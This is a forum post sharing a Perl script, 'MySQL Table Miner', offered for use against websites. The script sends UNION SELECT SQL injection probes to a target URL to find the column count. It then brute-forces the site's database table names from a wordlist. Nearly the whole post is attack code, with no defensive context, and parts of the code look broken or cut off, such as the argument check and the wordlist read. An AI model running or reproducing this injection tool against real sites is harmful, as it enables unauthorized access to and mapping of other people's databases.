sQuo Posted April 4, 2014 Share Posted April 4, 2014 MySQL Table Miner [LENGUAJE=perl]#!/usr/bin/perl # # MySQL Table Miner # -Finds # of args first, then tries table names # -Use 'bsqlinj.pl' to get database() # -dict.txt is default wordlist # amat use LWP; $browser = LWP::UserAgent->new; if (@ARGV print "Usage: $0 This is the hidden content, please Sign In or Sign Up expected_string database"; } $tables = "1"; $n = "0"; $target = $ARGV[0]; $expected = $ARGV[1]; $db = $ARGV[2]; print "\ntarget: $target\n"; print "expected: $expected\n"; print "database: $db\n"; open(DICT, "dict.txt") || die "No such file.\n"; @guess=; close(DICT); $words = scalar(@guess); print "words: $words\n\n"; loop(); sub loop { $test = " UNION SELECT $tables"; $response = $browser->get( $target . $test ); $_ = $response->content; if (m/$expected/) { print "\narguments: $nulls \n\n"; brute(); } else { $nulls = $nulls + 1; $tables = "$tables,1"; print "$test\n"; loop(); } } sub brute { chomp $guess[$n]; $db_test = "FROM $db.$guess[$n] WHERE 1=0"; $response = $browser->get( $target . $test . $db_test ); if (m/$expected/) { print "$test $db_test"; print "\ntable: $guess[$n]\n"; if ($words > $n) { $n = $n + 1; brute(); } } else { $n = $n + 1; print "$test $db_test\n"; if ($words > $n) { brute(); } } }[/LENGUAJE] Link to comment Share on other sites More sharing options...
Recommended Posts